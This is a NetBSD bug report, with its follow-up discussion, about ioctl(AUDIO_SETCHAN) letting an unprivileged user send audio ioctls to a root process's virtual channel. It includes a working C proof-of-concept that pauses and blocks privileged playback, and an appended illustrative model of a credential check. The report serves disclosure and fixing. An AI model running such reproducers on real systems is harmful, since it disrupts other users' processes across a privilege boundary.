NetBSD Problem Report #52627
From www@NetBSD.org Wed Oct 18 13:26:10 2017
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(Client CN "mail.NetBSD.org", Issuer "mail.NetBSD.org CA" (not verified))
by mollari.NetBSD.org (Postfix) with ESMTPS id BB0C77A20D
for <gnats-bugs@gnats.NetBSD.org>; Wed, 18 Oct 2017 13:26:10 +0000 (UTC)
Message-Id: <20171018132609.B025F7A2A9@mollari.NetBSD.org>
Date: Wed, 18 Oct 2017 13:26:09 +0000 (UTC)
From: isaki@pastel-flower.jp
Reply-To: isaki@pastel-flower.jp
To: gnats-bugs@NetBSD.org
Subject: ioctl(AUDIO_SETCHAN) is able to affect privileged process
X-Send-Pr-Version: www-1.0
>Number: 52627
>Category: kern
>Synopsis: ioctl(AUDIO_SETCHAN) is able to affect privileged process
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: isaki
>State: closed
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Wed Oct 18 13:30:00 +0000 2017
>Closed-Date: Sat May 25 03:16:52 +0000 2019
>Last-Modified: Sat May 25 03:16:52 +0000 2019
>Originator: Tetsuya Isaki
>Release: NetBSD 8.0_BETA
>Organization:
>Environment:
NetBSD 8.0_BETA i386
>Description:
ioctl(AUDIO_SETCHAN) allows subsequent audio ioctls to be issued to other
virtual channels. The virtual channel number does not have credentials
(and is predictable).
This allows an unprivileged user to issue any audio ioctls to a privileged
process (even if sysctl hw.<dev>.multiuser = 0).
>How-To-Repeat:
% cat a.c
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/audioio.h>
#include <sys/ioctl.h>

int main(int ac, char *av[])
{
	audio_info_t ai;
	int fd;
	int r;
	int val;

	fd = open("/dev/audioctl", O_RDWR);
	if (fd == -1)
		err(1, "open");

	/* fd is virtual channel 1, so upcoming virtual channel will be 2 */
	val = 2;
	r = ioctl(fd, AUDIO_SETCHAN, &val);
	if (r == -1)
		err(1, "AUDIO_SETCHAN");

	AUDIO_INITINFO(&ai);
	ai.play.pause = 1;
	for (;;) {
		usleep(1000);
		r = ioctl(fd, AUDIO_SETINFO, &ai);
		if (r == -1) {
			if (errno != ENXIO)
				err(1, "AUDIO_SETINFO");
			continue;
		}
		printf("pause!\n");
		break;
	}

	close(fd);
	return 0;
}
%
(First, execute this sample code as an unprivileged user)
% id -u
100
% gcc a.c
% ./a.out
(Then, start playback as a privileged user)
# id -u
0
# audioplay somemusic.wav
(this playback pauses soon and the process blocks...)
>Fix:
N/A.
In the narrow view, the virtual channel number also needs credentials? But
I don't know about the security area.
In the wide view, however, I think the new audio behavior (specification)
needs more consideration before 8.0.
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: kern-bug-people->nat
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Tue, 22 May 2018 02:34:05 +0000
Responsible-Changed-Why:
I'll handle this.
From: Nathanial Sloss <nat@netbsd.org>
To: gnats-bugs@netbsd.org
Cc:
Subject: Re: kern/52627 audio_setchan affecting privileged process
Date: Mon, 28 May 2018 11:07:12 +1000
Hi,
I have a proposed fix for affecting a privileged process.
Please see:
http://mail-index.netbsd.org/tech-kern/2018/05/28/msg023451.html
Please let me know if this works for you.
Best regards,
Nat
From: matthew green <mrg@eterna.com.au>
To: gnats-bugs@NetBSD.org
Cc: nat@NetBSD.org, gnats-admin@netbsd.org, netbsd-bugs@netbsd.org,
isaki@pastel-flower.jp
Subject: re: kern/52627 audio_setchan affecting privileged process
Date: Sat, 02 Jun 2018 04:24:39 +1000
i don't think this is a real bug. as i just posted to tech-kern:
> i object to the plan here. we should simply just use the
> file system to control this, like normal unix stuff.
>
> eg, ttyaction should chown the audio device to the console
> user or whatever the admin chooses. it should be possible
> for me to decide to make things as open or as closed as
> possible via chown/chmod/mknod/rm.
.mrg.
Responsible-Changed-From-To: nat->kern-bug-people
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Wed, 08 May 2019 21:55:03 +0000
Responsible-Changed-Why:
Responsible-Changed-From-To: kern-bug-people->isaki
Responsible-Changed-By: isaki@NetBSD.org
Responsible-Changed-When: Sat, 25 May 2019 03:16:52 +0000
Responsible-Changed-Why:
State-Changed-From-To: open->closed
State-Changed-By: isaki@NetBSD.org
State-Changed-When: Sat, 25 May 2019 03:16:52 +0000
State-Changed-Why:
By merging isaki-audio2 branch, AUDIO_SETCHAN is now obsoleted.
>Unformatted:
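Added example (not part of the original report and not NetBSD kernel code): a user-space model of the "virtual channel number also needs credentials" idea raised under >Fix, next to the number-only selection described under >Description. The struct, the function names, the sample channel table and the owner-or-root policy are all assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical model: a channel number plus the uid that opened it. */
struct vchan { int id; uid_t owner; int paused; };

/* Constructed sample table: channel 1 opened by uid 100, channel 2 by root. */
static struct vchan chans[] = { { 1, 100, 0 }, { 2, 0, 0 } };

static struct vchan *lookup(int id)
{
    for (size_t i = 0; i < sizeof(chans) / sizeof(chans[0]); i++)
        if (chans[i].id == id)
            return &chans[i];
    return NULL;
}

/* As described in the report: the (predictable) number alone picks the target. */
int pause_unchecked(uid_t caller, int id)
{
    struct vchan *vc = lookup(id);
    (void)caller;               /* caller identity is never consulted */
    if (vc == NULL)
        return ENXIO;           /* no such channel yet, as in the reproducer */
    vc->paused = 1;
    return 0;
}

/* Assumed policy: only the channel's owner or root may act on it. */
int pause_checked(uid_t caller, int id)
{
    struct vchan *vc = lookup(id);
    if (vc == NULL)
        return ENXIO;
    if (caller != 0 && caller != vc->owner)
        return EPERM;           /* knowing the number is not enough */
    vc->paused = 1;
    return 0;
}

int main(void)
{
    printf("checked:   uid 100 -> chan 2: %d\n", pause_checked(100, 2));
    printf("unchecked: uid 100 -> chan 2: %d\n", pause_unchecked(100, 2));
    return 0;
}
```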